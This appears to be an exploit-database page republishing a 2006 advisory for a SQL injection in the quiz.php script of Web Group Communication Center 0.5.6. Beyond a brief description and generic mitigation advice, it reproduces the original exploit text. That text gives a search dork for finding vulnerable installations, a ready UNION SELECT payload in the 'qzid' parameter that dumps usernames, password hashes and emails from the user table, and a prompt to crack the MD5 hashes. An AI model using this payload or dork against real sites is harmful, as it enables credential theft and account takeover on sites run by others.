header-logo
Suggest Exploit
vendor:
Web Group Communication Center
by:
ajann
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Web Group Communication Center
Affected Version From: 0.5.5
Affected Version To: 0.5.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code in the vulnerable parameter 'qzid' of the 'quiz.php' script. This can be used to bypass authentication, access, modify or delete data from the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Title  :   WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability
# Author :   ajann
# Dork   :   "Web Group Communication Center beta 0.5.6/0.5.5/.."
# Greetz :   Tüm, Müslüman, Aleminin, Ramazan, Bayram., MUBAREK, Olsun

-->Login Before Injection

[Inject]]]

### http://[target.com]/[path]/quiz.php?action=show&qzid=[]SQL INJECTION[]

Example:
quiz.php?action=show&qzid=-1%20union%20select%200,0,0,0,username,passwort,email,0,0,0,0,0,0,0,0%20from%20wgcc_user%20where%20userid=1

++ userid=1 Change This

Crack MD5 HASH

[/Inject]]]

#ajann,Turkey
#...

#Im Not Hacker!

# milw0rm.com [2006-10-20]

Navigation

Suggest Exploit

Services By CQR